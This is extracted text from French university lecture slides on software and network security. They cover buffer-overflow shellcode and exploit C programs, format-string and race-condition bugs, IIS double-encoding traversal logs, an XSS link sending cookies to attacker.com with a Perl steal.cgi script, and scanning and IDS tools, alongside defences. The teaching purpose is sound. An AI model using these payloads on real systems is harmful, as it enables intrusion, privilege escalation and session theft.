30/08/2013 - ENSICAEN (c) dp 108

Gestion de pile sous Linux x86


.text
.align 4 .globl function .type function,@function function: pushl %ebp movl %esp,%ebp subl $20,%esp .L1: leave ret .Lfe1: .size function,.Lfe1-function .align 4 .globl main .type main,@function main: pushl %ebp movl %esp,%ebp pushl $3 pushl $2 pushl $1 call function addl $12,%esp .L2: leave ret

30/08/2013

- ENSICAEN -

(c) dp

109

Gestion de pile sous Linux x86


user stack c b a ret sfp buffer1 buffer2 heap bss

30/08/2013

- ENSICAEN -

(c) dp

110

Code Shell
Le buffer overflow va tre utilis pour provoquer l'excution de /bin/sh, shell prsent dans toutes les distributions unix. Gnration du code assembleur de la squence: execve (argv[0],"/bin/sh",NULL) Exemple code Linux x86:
char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh";
30/08/2013 - ENSICAEN (c) dp 111

Exemple Buffer Overflow/Code Shell


char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; char large_string [128] ; void main () { char buffer [96] ; int i ; long *long_ptr = (long *) large_string ; for (i = 0 ; i < 32 ; i++) *(long_ptr + i) = (int) buffer ; for (i = 0 ; i < strlen (shellcode) ; i++) large_string [i] = shellcode [i] ; strcpy (buffer,large_string) ; } 30/08/2013 - ENSICAEN (c) dp 112

Exemple Buffer/Overflow/Code Shell


ret (4) sfp (4)

strcpy overflow

long_ptr (4)

i (4)

buffer (96)

large_string (128)

shellcode

30/08/2013

- ENSICAEN -

(c) dp

113

Stack Smashing
Dans la ralit, les applications ne comportent naturellement pas de squence shell. L'exploitation d'un "buffer overflow" ncessite d'essaye de piger l'application avec la ligne de commande, les variables d'environnement shell, les entres de donnes interactives,

30/08/2013

- ENSICAEN -

(c) dp

114

Exemple dapplication
char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\ xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"\xff\xff/bin/sh"; void main () { char buffer [128] ; int i ; long address = (long)&buffer ; for (i = 0 ; i < 128 ; i++) buffer [i] = 0x90 ; buffer [12] = address >> 0 & 0xff ; buffer [13] = address >> 8 & 0xff ; buffer [14] = address >> 16 & 0xff ; buffer [15] = address >> 24 & 0xff ; for (i = 0 ; i < strlen (shellcode) ; i++) buffer [128 - strlen (shellcode) + i] = shellcode [i] ; execl ("/users/dp/bufferoverflow/demo","demo",buffer,0) ; }

-rws--x--x 1 root

root

11800 Sep 16 11:4 /users/dp/bufferoverflow/demo

30/08/2013

- ENSICAEN -

(c) dp

115

Stack Smashing Prevention


Les fonctions de manipulation de chanes sans contrle de longueur sont vulnrables. Liste non exhaustive:

gets (str) strcpy (str1,str2) strcat (str1,str2) scanf ("%s",str)


30/08/2013 - ENSICAEN -

fgets (stdin,str,10) strncpy (str1,str2,10) strncat (str1,str2,10) scanf ("%10s",str)


(c) dp 116

Stack Smashing Prevention


Utilisation de logiciels daudit de code source; Exemple: logiciel RATS (Rough Auditing Tool for Security) http://www.securesw.com/download_rats.htm/ La pile peut tre rendu non excutable:
Patch linux: http://www.openwall.com/linux Solaris: ajout dans /etc/system:
set noexec_user_stack=1 set noexec_user_stack_log=1

Certains compilateurs peuvent mettre un repre ("canary") devant l'adresse de retour afin de la protger (stackguard driv de gcc).
30/08/2013 - ENSICAEN (c) dp 117

Exemple stackguard
sfp ret canary buffer

En cas dattaque
on crase le buffer, canary et ret avant le retour de la fonction, le programme vrifie le contenu de canary et dtecte lintrusion Le canary doit tre gnr alatoirement.

30/08/2013

- ENSICAEN -

(c) dp

118

Exemple de vulnrabilit

30/08/2013

- ENSICAEN -

(c) dp

119

Chanes de format
Problme connu depuis juin 1999 et exploit depuis juin 2000. Leur exploitation ont conduit des vulnrabilits "remote root" (wu-ftpd, linux tpc.statd, ) et "local root" (OpenBSD fstat, ) De nombreuses vulnrabilits sont probablement encore venir.
30/08/2013 - ENSICAEN (c) dp 120

Fonctions C de formatage
Exemples de telles fonctions: toute la famille des fonctions printf, syslog. Fonctions acceptant un nombre variable de paramtres dont l'un est une chane de format. Les variables affiches sont converties en une reprsentation affichable et comprhensible par l'homme.
30/08/2013 - ENSICAEN (c) dp 121

Fonctionnement d'un printf


printf ("les nombres valent %d %d\n",a,b);
b a chane de format

2 particularits dans les fonctions de la famille printf:


printf ("%s%n\n",chaine,&count); printf (chaine) ;
30/08/2013 - ENSICAEN (c) dp 122

Exploitation d'une chane de format


Modification de la valeur de la variable target:
#include <stdio.h> main (int argc,char **argv) { char inbuf[100]; char outbuf [100] ; int target = 33 ; memset (inbuf,'\0',100) ; memset (outbuf,'\0',100) ; read (0,inbuf,100) ; sprintf (outbuf,inbuf) ; printf ("%s",outbuf) ; printf ("target = %d\n",target) ; }
30/08/2013 - ENSICAEN (c) dp 123

Format String + Buffer Overflow


Exemple: vulnrabilit de qpop 2.53
#include <stdio.h> void fonction (char *user) { char outbuf [512] ; char buffer [512] ; sprintf (buffer,"ERR Wrong command: %400s",user) ; sprintf (outbuf,buffer) ; } void main () { char user [128] ; read (0,user,sizeof (user)) ; fonction (user) ; }
30/08/2013 - ENSICAEN (c) dp 124

Vulnrabilit qpop 2.53


Objectif: faire dborder outbuf sur l'adresse de retour; celle ci pointera sur user. user: ["Shell code" "%97c" "Adresse de user] buffer: aprs le 1er sprintf
["Err Wrong Command : "" Shell code%97cAdresse de user] ----------20---------------------------------400----------------

Le 2me sprintf interprte le %97c; il fait dborder outbuf.


30/08/2013 - ENSICAEN (c) dp 125

Exemple de vulnrabilit

30/08/2013

- ENSICAEN -

(c) dp

126

Race Condition
Toute ressource (fichiers, structure de donnes, ) peut tre manipule simultanment par plusieurs processus ou plusieurs threads. Certaines oprations doivent donc tre rendues atomiques. Les droits d'accs doivent tre trs prcis. Exemple: quel est danger du programme sur le transparent suivant, sachant que l'excutable appartient "root" et possde le SetUser ID (bit s) ?
30/08/2013 - ENSICAEN (c) dp 127

Race Condition
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> int main (int argc,char **argv) { struct stat st ; FILE *fp ; if (argc != 3) { fprintf (stderr,"usage : %s fichier message\n", argv [0]) ; exit (EXIT_FAILURE) ;} if (stat (argv [1], &st) < 0) {fprintf (stderr,"%s introuvable\n",argv [1]) ;exit (EXIT_FAILURE) ;} if (st.st_uid != getuid ()) {fprintf (stderr,"%s ne vous appartient pas !\n", argv [1]) ;exit (EXIT_FAILURE) ;} if (! S_ISREG (st.st_mode)) {fprintf (stderr,"%s n'est pas un fichier normal\n", argv [1]) ;exit (EXIT_FAILURE) ;} if ( (fp = fopen (argv [1],"w")) == NULL) {fprintf (stderr,"Ouverture impossible\n") ;exit (EXIT_FAILURE) ;} fprintf (fp,"%s\n",argv [2]) ;fclose (fp) ;fprintf (stderr,"Ecriture OK\n") ; exit (EXIT_SUCCESS) ; }

30/08/2013

- ENSICAEN -

(c) dp

128

Fonctions utiliser
Il faut conserver la totale matrise d'un fichier lors de sa manipulation d'un fichier. Quelques exemples de fonctions utilisables:
int open (pathname,flag,mode) fstat (inf fd,struct stat *st) Ouverture d'un fichier. Renvoie un descripteur Informations sur un fichier

FILE *fdopen (int fd,char *mode) Obtenir un flux partir d'un descripteur dj ouvert

30/08/2013

- ENSICAEN -

(c) dp

129

Fichiers temporaires
Les applications crent des fichiers temporaires dans /tmp
drwxrwxrwt 6 root root 1024 Sep 29 15:01 /tmp Problme quand le nom du fichier temporaire est prvisible et cr par une application root suid: Cration d'un lien symbolique entre ce fichier et un fichier systme critique (/etc/shadow par exemple) L'application doit tre ensuite tue pour qu'elle ne puisse effacer son fichier temporaire.
30/08/2013 - ENSICAEN (c) dp 130

Exemple programme erron


#include <stdio.h> void main () { FILE *fp ; char chaine [80] ; memset (chaine,'\0',sizeof (chaine)) ; if ( (fp = fopen ("/tmp/stupide","w")) == NULL) { exit (1) ; } read (0,chaine,sizeof (chaine)) ; fprintf (fp,"%s",chaine) ; fclose (fp) ;
}
30/08/2013 - ENSICAEN (c) dp 131

Fichiers temporaires
Cration d'un rpertoire dans un rpertoire disposant d'un bit "t" (sticky bit):
Nom de fichier alatoire. Fichier ouvert avec les droits O_CREAT|O_EXCL (attention aux disques NFS avec O_EXCL).

La fonction tmpfile (3) cre un fichier temporaire dans le rpertoire spcifi par la variable P_tmpdir de stdio.h. Mais pas de prcision sur les droits d'accs.
Utiliser plutt mkstemp (3) en conjonction avec umask (2).
30/08/2013 - ENSICAEN (c) dp 132

Cration d'un fichier temporaire


#include <stdio.h> FILE *create_tempfile (char *temp_filename_pattern) { int temp_fd,old_mode ; FILE *tmp ; old_mode = umask (077) ; temp_fd = mkstemp (temp_filename_pattern) ; umask (old_mode) ; if (temp_fd == -1) { exit (1); } if ( ! (tmp = fdopen (temp_fd,"w+b"))) { exit (1) ; } return tmp ; } void main () { char pattern [ ] = "/tmp/demoXXXXXX" ; create_tempfile (pattern) ; unlink (pattern) ; /* Effacement */ } 30/08/2013 - ENSICAEN (c) dp 133

Exemple de vulnrabilit

30/08/2013

- ENSICAEN -

(c) dp

134

Erreurs de dcodage d'URL


Certains caractres doivent tre "chapps"; par exemple le passage de paramtres un CGI, les caractres encods sur plusieurs octets. Caractre chapp: %XX o XX est le code hexadcimal du caractre encoder. Exemple: nick=test+param%E8tre&channel=France Des serveurs webs peuvent ne pas dcoder de manire propre.
30/08/2013 - ENSICAEN (c) dp 135

Erreur de dcodage d'URL


Un serveur web est amen prendre une dcision en fonction d'une URL: Le chemin indiqu ne doit pas sortir de la racine du serveur WEB L'extension du fichier dcide du handler activer (.cgi, .jsp, ); un fichier se terminant par .jsp%00.html peut tre considr comme un fichier html par les mcanismes de scurit mais excut comme du code java (Java Server Page). L'utilisateur doit avoir les permissions adquates pour accder au fichier ou rpertoire indiqu. Beaucoup de serveurs web effectuent des tests de scurit avant le dcodage et non aprs.
- ENSICAEN (c) dp 136

30/08/2013

Etude de cas
Microsoft IIS 4.0 et 5.0 tait vulnrable au problme: "MS IIS/PWS Escaped Characters Decoding Command Execution Vulnrability". Dtail sur http://www.securityfocus.com/cgi-bin/vulnsitem.pl?section=discussion&id=2708 Correctif sur http://www.microsoft.com/technet/security/bulletin/MS01026.asp

Chaque requte subit le traitement suivant:


dcodage. test de scurit. si le test de scurit est valid, dcodage nouveau avant utilisation.
30/08/2013 - ENSICAEN (c) dp 137

IIS : Etude de cas


On tente d'excuter une commande sur le systme distant: besoin de transmettre la chane ..\.. Codage: ..%5c.. Echec Double codage: ..%255c.. Succs Plusieurs exploits disponibles, par exemple execiis.c par Filip Maertens, filip@securax.be

30/08/2013

- ENSICAEN -

(c) dp

138

Exemples d'attaque
Donnes extraites du fichier de log de http://www.ensicaen.fr
host-213-191-162-202.warsun.com - - [27/Aug/2004:07:42:22 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 195.224.89.179 - - [28/Aug/2004:14:17:43 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 artemisa.escet.urjc.es - - [05/Sep/2004:20:17:35 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 195.167.240.188 - - [08/Sep/2004:03:53:14 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 128.192.164.95 - - [10/Sep/2004:02:46:42 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

30/08/2013

- ENSICAEN -

(c) dp

139

Exemple de mauvais dcodage d'URL


Vulnrabilit dcouverte en juillet 2007 (CVE-2007-3845, BID-24837). Concerne Firefox sous Windows XP avec Internet Explorer 7 install Mauvaise gestion du caractre spcial "%00" dans les chanes formant les URI (Uniform Ressource Identifier)
30/08/2013 - ENSICAEN (c) dp 140

Exemple de mauvais dcodage d'URL


Envoyer votre courrier ici <a target="_blank" href='mailto:%00%00../../../../../windows/system32/cmd".exe . ./../../../../../windows/system32/calc.exe " - " toto.bat'>dp@ensicaen.fr</a>

30/08/2013

- ENSICAEN -

(c) dp

141

Le cross site scripting


Attaque connue depuis fvrier 2000:
http://www.cert.org/advisories/CA-2000-02.html

Pourquoi ce nom :
Attaque base sur lexcution de scripts dans le navigateur de la victime (javascript, vbscript, ). La victime passe dun site lautre sans sen apercevoir.

Lacronyme XSS:
CSS : Cascading Style Sheet XSS : Cross Site Scripting (excution croise de code).
30/08/2013 - ENSICAEN (c) dp 142

Intrt de XSS
http est un protocole sans notion de session: pas de lien entre les requtes reues par le serveur. Une session doit tre construite artificiellement: Par un cookie envoy au navigateur Par manipulation dURL contenant un identifiant Par des paramtres dun programme Etc.

30/08/2013

- ENSICAEN -

(c) dp

143

Exemple dattaque

Herv Schauer Consultants http://www.hsc.fr

30/08/2013

- ENSICAEN -

(c) dp

144

Comment dtourner le cookie


Le client a consult un site pirate. Le client a reu un courrier lectronique contenant un lien vers un site pirate. Le serveur consult a t pirat et contient un lien vers le site pirate. Un code malveillant pointant vers le site pirate a t insr dans les saisies du client. Etc.

30/08/2013

- ENSICAEN -

(c) dp

145

Exemple de mise en oeuvre


Une vulnrabilit XSS est dtecte sur le site www.vulnerable.com Un utilisateur clique sur un lien (reu par courriel, trouv sur un livre dor, ):
Nom dun champ du formulaire

<html> <a href="http://www.vulnerable.com/var=<script>do cument.location.replace(http://attacker.com/steal .cgi?+document.cookie);</script>"> cliquer ici pour recevoir 50 euros </a> </html> 30/08/2013 - ENSICAEN (c) dp 146

Script steal.cgi
#!/usr/bin/perl # steal.cgi by David Endler dendler@idefense.com # Specific to your system $mailprog = '/usr/sbin/sendmail'; # create a log file of cookies, well also email them too open(COOKIES,>>stolen_cookie_file); # what the victim sees, customize as needed print "Content-type:text/html\n\n"; print <<EndOfHTML; <html><head><title>Cookie Stealing</title></head> <body> Your Cookie has been stolen. Thank you. </body></html> EndOfHTML # The QUERY_STRING environment variable should be filled with # the cookie text after steal.cgi: # http://www.attacker.com/steal.cgi?XXXXX print COOKIES $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n"; print MAIL $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; close (MAIL);

30/08/2013

- ENSICAEN -

(c) dp

147

Exemple de code faible

<html> <?php print $nom ; ?> </html>

fichier test1_xss.php3
30/08/2013 - ENSICAEN (c) dp 148

Remde possible
Ne jamais faire confiance une saisie utilisateur. Ne jamais afficher lcran tel quel une saisie utilisateur. Filtrer tous les caractres indsirables (comme les caractres < et >). Exemple en php: print htmlspecialchars ("Bonjour $nom") ;
30/08/2013 - ENSICAEN (c) dp 149

Lauthentification .htaccess
Systme dauthentification frquemment utilis pour restreindre laccs au contenu de rpertoires spcifiques. Filtre par domaine, mcanisme login/mot de passe. Fichier .htaccess par dfaut.
30/08/2013 - ENSICAEN (c) dp 150

Exemple de connexion

30/08/2013

- ENSICAEN -

(c) dp

151

Ecoute de la phase de connexion

Mot de passe uuencode

30/08/2013

- ENSICAEN -

(c) dp

152

Injection SQL
Beaucoup d'applications web s'appuient sur des bases de donnes. Les requtes SQL utilisent des informations saisies par les utilisateurs. Les informations doivent tre traites avant utilisation.
30/08/2013 - ENSICAEN (c) dp 153

Injection SQL

SELECT login FROM users WHERE login = '$login' AND password='$password'

Quel risque si les valeurs du formulaire sont utilises sans vrification ?

30/08/2013

- ENSICAEN -

(c) dp

154

Injection SQL

http://www.xkcd.com/327

30/08/2013

- ENSICAEN -

(c) dp

155

Scurit des systmes


30/08/2013 - ENSICAEN (c) dp 156

Disponibilit
Plusieurs ordinateurs peuvent tre regroups en grappe (cluster) pour tre visibles comme un seul ordinateur et permettre:
D'augmenter la disponibilit De mieux rpartir la charge Permettre la monte en charge

Exemples:
xgrid (apple), cluster linux, windows server,
30/08/2013 - ENSICAEN (c) dp 157

Virtualisation
Ensemble des technologies matrielles et/ou logicielles qui permettent de faire fonctionner sur une seule machine plusieurs systmes d'exploitation et/ou plusieurs applications, sparment les uns des autres, comme s'ils fonctionnaient sur des machines physiques distinctes. Quelques avantages:
Optimiser l'usage des ressources d'une machine tout en isolant les services entre eux. Optimisation du taux dutilisation des ressources informatiques Economie dnergie ( green computing ) Gain conomique et dencombrement Possibilit de cloner et/ou de dplacer des machines

Quelques risques
Une panne ou une indisponibilit dune ressource commune peut bloquer tous les services hbergs. En fonction de la solution virtualisation, un manque de cloisonnement peut engendrer une fuite dinformations. Risque de copie non souhaite de machine virtuelle - ENSICAEN (c) dp 158

30/08/2013

Logiciels de virtualisation
vmware
http://www.vmware.com

Citrix Xen Server


http://www.citrix.com

Vserver
http://www.linux-vserver.org

Virtualbox: virtualisation du poste de travail


http://www.virtualbox.org/
30/08/2013 - ENSICAEN (c) dp 159

Les outils d'attaques/dfenses


30/08/2013 - ENSICAEN (c) dp 160

Beaucoup d'outils disponibles


outils de scurit

Visite de G. Bush la NSA en janvier 2006

30/08/2013

- ENSICAEN -

(c) dp

161

Anatomie d'une attaque


Rcolte d'informations sur une cible potentielle. Interrogation des bases whois. Utilisation de moteurs de recherche. Analyse de la cible (cartographie, recherche des services ouverts et des vulnrabilits).
30/08/2013 - ENSICAEN (c) dp 162

Cartographie du rseau
Mthode standard peu efficace: ping (Packet Internet Groper). Outils plus sophistiqus: Pinger http://www.nmrc.org/files/snt/ fping http://www.fping.com hping3 http://www.hping.org - Test firewall rules - Advanced port scanning - Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. - Path MTU discovery - Transferring files between even really fascist firewall rules. - Traceroute-like under different protocols. - Firewalk-like usage. - Remote OS fingerprinting. - TCP/IP stack auditing. - A lot of others.

30/08/2013

- ENSICAEN -

(c) dp

163

Cartographie du rseau
Le DNS d'un site centralise toutes les machines connectes au rseau. Certains DNS incorrectement configurs peuvent autoriser des transferts de zones: dig @ns.domaine.com domaine.com axfr Outil DNSMap rcupration dinformations

30/08/2013

- ENSICAEN -

(c) dp

164

Recherche des services ouverts


Recherche des services ouverts un instant donn. Utilisation d'un scanner de ports Envoi d'un paquet (TCP,UDP,ICMP) sur une cible et analyse du rsultat; suivant les cas on pourra dterminer l'tat d'un port (ouvert,ferm, filtr). Beaucoup de logiciels disponibles: Unix: nmap, jakal, IdentTCPscan Windows: ISS,YAPS
30/08/2013 - ENSICAEN (c) dp 165

nmap
Outil de rfrence. nmap sous unix (http://www.nmap.org) Scanne une machine ou un rseau la recherche des services ouverts et de son identit. Supporte de nombreuses techniques de scan:

30/08/2013

- ENSICAEN -

(c) dp

166

nmap: techniques de scan


vanilla TCP connect () TCP SYN (half open) TCP FIN (stealth) Xmas scan Null scan TCP ftp proxy (bounce attack) SYN/FIN using IP fragments UDP recvfrom () RPC scan Reverse-ident
- ENSICAEN (c) dp

(-sT, dfaut) (-sS) (-sF) (-sX) (-sN) (-b server) (-f) (-sU) (-sR) (-I)
167

30/08/2013

nmap
Beaucoup de fonctionnalits prsentes dans nmap: Scan Sans envoi de trame ICMP (-P0) Scan en mode verbeux (-v v) Impose le port source (-g port) FingerPrinting: Remote OS detection (-O) decoy scanning (-Ddecoy_host1,decoy2[,...]) Timing policy (-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane)

30/08/2013

- ENSICAEN -

(c) dp

168

Exemple nmap (Zenmap)

30/08/2013

- ENSICAEN -

(c) dp

169

Scan Spoof
hping permet de scanner une machine en usurpant l'identit d'une autre:
scanner
SYN, port, source=rebond RST si port ferm

cible

SYN-ACK

hping r rebond rebond (machine peu active)

RST si port ouvert

30/08/2013

- ENSICAEN -

(c) dp

170

FingerPrinting passif
FingerPrinting est dit passif quand il n'met aucune information:
Analyse des trames envoyes par une machine distante. Analyse d'un fichier de log.

Exemple: p0f
http://www.stearns.org/p0f
30/08/2013 - ENSICAEN (c) dp 171

Association port-processus
Comment trouver localement quel processus est en coute sur un port:
Unix
netstat anp (sur les versions rcentes d'unix) commande plus gnrale: lsof (LiSt Opened Files)
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof

lsof i | grep LISTEN

Windows
Active Ports tcpview
30/08/2013 - ENSICAEN (c) dp 172

Exemple Unix "lsof"


httpd httpd httpd httpd httpd httpd sshd xinetd xinetd httpd httpd squid httpd 1053 root 16u IPv4 3262 TCP *:http (LISTEN) 1060 nobody 16u IPv4 3262 TCP *:http (LISTEN) 1061 nobody 16u IPv4 3262 TCP *:http (LISTEN) 1062 nobody 16u IPv4 3262 TCP *:http (LISTEN) 1063 nobody 16u IPv4 3262 TCP *:http (LISTEN) 1064 nobody 16u IPv4 3262 TCP *:http (LISTEN) 1073 root 3u IPv4 3310 TCP *:ssh (LISTEN) 1088 root 5u IPv4 3327 TCP *:pn-raproxy (LISTEN) 1088 root 6u IPv4 3328 TCP *:telnet (LISTEN) 1213 nobody 16u IPv4 3262 TCP *:http (LISTEN) 7996 nobody 16u IPv4 3262 TCP *:http (LISTEN) 14787 nobody 11u IPv4 13401405 TCP *:squid (LISTEN) 17885 nobody 16u IPv4 3262 TCP *:http (LISTEN)
- ENSICAEN (c) dp 173

30/08/2013

Exemple Windows

30/08/2013

- ENSICAEN -

(c) dp

174

Recherche des versions utilises


Les versions des services utilises donnent des indications sur les vulnrabilits potentielles. Les versions peuvent parfois tre obtenues par un simple telnet sur un port donn: Exemples:

30/08/2013

- ENSICAEN -

(c) dp

175

Numro de version d'un serveur web


dp@debian-mx1:~$ telnet www.ensicaen.fr 80 Trying 193.49.200.59... Connected to serv2.ensicaen.fr. Escape character is '^]'. quit <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>501 Method Not Implemented</TITLE> </HEAD><BODY> <H1>Method Not Implemented</H1> quit to /index.html not supported.<P> Invalid method in request quit<P> <HR> <ADDRESS>Apache/1.3.26 Server at www.ensicaen.fr Port 80</ADDRESS> </BODY></HTML> Connection closed by foreign host. Attention: le rsultat est-il garanti ?

30/08/2013

- ENSICAEN -

(c) dp

176

Concept de faille
Une faille est une vulnrabilit permettant des attaquants d'obtenir un accs non autoris un systme. On peut trouver des vulnrabilits tous les niveaux:
routeurs logiciels client/serveur systme d'exploitation firewalls

30/08/2013

- ENSICAEN -

(c) dp

177

Vulnrabilits
Des dizaines de vulnrabilits sont dcouvertes chaque semaine (environ 7000 failles publies sur Internet en 2011 et 26 millions de codes malveillants diffuss*) Une vulnrabilit peut tre la consquence d'une ngligence (mot de passe nul ou trivial par exemple) ou d'une erreur de programmation (buffer overflow, ). Certaines vulnrabilits peuvent tre gardes secrtes ( des fins d'espionnage, d'utilisation mafieuse, ). La dcouverte de nouvelles vulnrabilits peut faire l'objet de rmunration; on entre dans l're du "vulnerability business". Certaines vulnrabilits peuvent tre divulgues immdiatement (0 day); phnomne dangereux et irresponsable. Certains sites diffusent des exploits sans mentionner de correctifs.

* Source: rapport PandaLabs 2012

30/08/2013

- ENSICAEN -

(c) dp

178

Vulnrabilits
Un administrateur doit se tenir inform quotidiennement des dernires vulnrabilits et avoir de la ractivit. Beaucoup d'information en ligne: Sites officiels CERT (Computer Emergency Response Team) Gouvernement franais:
Premier Ministre SGDN (Secrtaire Gnral de la Dfense Nationale) ANSSI (Agence Nationale de la Scurit des Systmes dInformation) COSSI (Centre Oprationnel de la scurit des Systmes dInformations) CERTA (Centre d'Expertise de Rponse et de Traitement des Attaques)

Sites spcialiss Listes de diffusion: BugTraq

(http://www.securityfocus.com)
30/08/2013

et beaucoup d'autres

- ENSICAEN -

(c) dp

179

Correction des vulnrabilits


Correctifs (patches) sur les sites des constructeurs (pas toujours immdiat). Rcuprer les dernires versions des applications dans le cas des logiciels libres.

30/08/2013

- ENSICAEN -

(c) dp

180

Recherche des vulnrabilits


Un scanner est un programme qui dtecte les faiblesses de scurit d'une machine distante ou locale. En interrogeant les ports TCP/IP, on peut dtecter: Les services excuts un moment prcis Les utilisateurs propritaires de ces services Si les connexions anonymes sont acceptes Si certains services rseaux ncessitent une authentification etc.
30/08/2013 - ENSICAEN (c) dp 181

Scanners
Attention aux problmes lgaux et thiques lors de l'utilisation de scanners. Les scanners laissent des traces dans les fichiers d'audit. On trouve des scanners commerciaux et domaines public.
30/08/2013 - ENSICAEN (c) dp 182

Scanners
Historiquement: SATAN (Security Administrator's Tool for Analysing Networks) distribu en avril 1995 par Dan Farmer et Weitse Venema. Quelques rfrences de scanners:
nessus http://www.nessus.org iss http://www.iss.net
30/08/2013 - ENSICAEN (c) dp 183

Nessus: un outil de test de scurit


Tlchargeable sur :
http://www.nessus.org

Modle client/serveur: Utilise des plug-in Dispose un langage de programmation (NASL = Nessus Attack Scripting Language)
30/08/2013 - ENSICAEN (c) dp 184

Nessus: suite
Gnre des rapports clairs et exportables. Base de donnes des vulnrabilits connues remise jour rgulirement. Nessus (Licence GPL jusque V2)

Nessus (Licence propritaire)


30/08/2013 - ENSICAEN (c) dp

OpenVAS
185

Nessus: exemple de rsultat

30/08/2013

- ENSICAEN -

(c) dp

186

start_denial(); PADDING = 0x1c; FRG_CONST = 0x3; sport = 123; dport = 321;

Exemple plug-in: bonk.nasl (extrait)

udp1 = forge_udp_packet( ip : ip, uh_sport: sport, uh_dport: dport, uh_ulen : 8 + PADDING); set_ip_elements(ip : ip, ip_off : FRG_CONST + 1, ip_len : 20 + FRG_CONST); udp2 = forge_udp_packet(ip : ip,uh_sport : sport, uh_dport : dport, uh_ulen : 8 + PADDING); send_packet(udp1, udp2, pcap_active:FALSE) x 500; sleep(5); alive = end_denial(); if(!alive){ set_kb_item(name:"Host/dead", value:TRUE); security_hole(0, prototype:"udp"); }

addr = this_host(); ip = forge_ip_packet(ip_v : 4, ip_hl : 5, ip_len : 20 + 8 + PADDING, ip_id : 0x455, ip_p : IPPROTO_UDP, ip_tos : 0, ip_ttl : 0x40, ip_off : IP_MF, ip_src : addr);

30/08/2013

- ENSICAEN -

(c) dp

187

Exploitation des vulnrabilits


Le compte rendu des scanners peut tre corrl avec les bases de donnes d'incidents pour obtenir l'exploit correspondant. exemples:
http://www.securityfocus.com (rfrencement BID) http://cve.mitre.org (rfrencement CVE)
30/08/2013 - ENSICAEN (c) dp 188

Intrusion Detection System


Bas sur: une approche comportementale: dfinition de profils type d'utilisateur, une approche par scnario: cration d'une base de donnes d'attaques, de signatures, Un IDS ne doit pas gnrer trop de "faux positifs". Surveillance sur le rseau: NIDS (Network Intrusion Detection System).
30/08/2013 - ENSICAEN (c) dp 189

Snort: un exemple de NIDS


Network Intrusion Detection Software Permet de dtecter les scanners et tentatives dintrusion Tlchargeable sur http://www.snort.org

30/08/2013

- ENSICAEN -

(c) dp

190

Snort: fonctionnalits
Dtection au niveau des protocoles IP TCP UDP ICMP Dtection dactivits anormales Stealth scan, OS Finger Printing code ICMP invalide Prprocesseur pour la gestion des fragments, les sessions http,
30/08/2013 - ENSICAEN (c) dp 191

Architecture de snort
Sortie 1 plugins de dtection Prprocesseur 1

Prprocesseur n dcodage Dtection

Sortie n

libpcap

30/08/2013

- ENSICAEN -

(c) dp

192

Snort: exemples de rgles


alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (msg:"MYSQL root login attempt"; flow:to_server,established; content:"|0A 00 00 01 85 04 00 00 80 72 6F 6F 74 00|"; classtype:protocol-command-decode; sid:1775; rev:1;) alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (msg:"MYSQL show databases attempt"; flow:to_server,established; content:"|0f 00 00 00 03|show databases"; classtype:protocol-command-decode; sid:1776; rev:1;)
- ENSICAEN (c) dp 193

30/08/2013

Exemple de rsultat snort (avec ipcop)

30/08/2013

- ENSICAEN -

(c) dp

194

Exemple d'attaquant

30/08/2013

- ENSICAEN -

(c) dp

195

Intrusion Prevention System


Un IPS peut stopper un trafic jug suspect. Un logiciel peut se trouver sur un routeur, sur un firewall ou sur un botier spcialis en rupture du rseau. Exemples d'diteur d'IPS:
Cisco, ISS, McAfee,
30/08/2013 - ENSICAEN (c) dp 196

Mtrologie
Les outils d'analyse de trafic et de mtrologie permettent de dtecter l'utilisation anormale du rseau et les pics de consommation (scan massif, ). Quelques exemples d'outils:
extra (EXternal TRaffic Analyser) http://lpsc.in2p3.fr/extra/ mrtg (Multi Router Traffic Grapher) http://www.mrtg.org vigilog http://vigilog.ensmp.fr/
30/08/2013 - ENSICAEN (c) dp 197

extra
Logiciel de monitoring du trafic rseau Fonctions de base:
Recueil des logs routeurs (IP source, IP destination, Port source, Port destination, volume). Stockage dans une base de donnes Traitement systmatique sur les logs Interface graphique d'analyse
30/08/2013 - ENSICAEN (c) dp 198

INTERNET

EXTRA
EXTRA BD

RESEAU LOCAL
LOAD START/STOP LOGS

ROUTEUR
SNIFFER

COLLECTEUR

30/08/2013

- ENSICAEN -

(c) dp

199

Exemple de rsultat

30/08/2013

- ENSICAEN -

(c) dp

200

mrtg
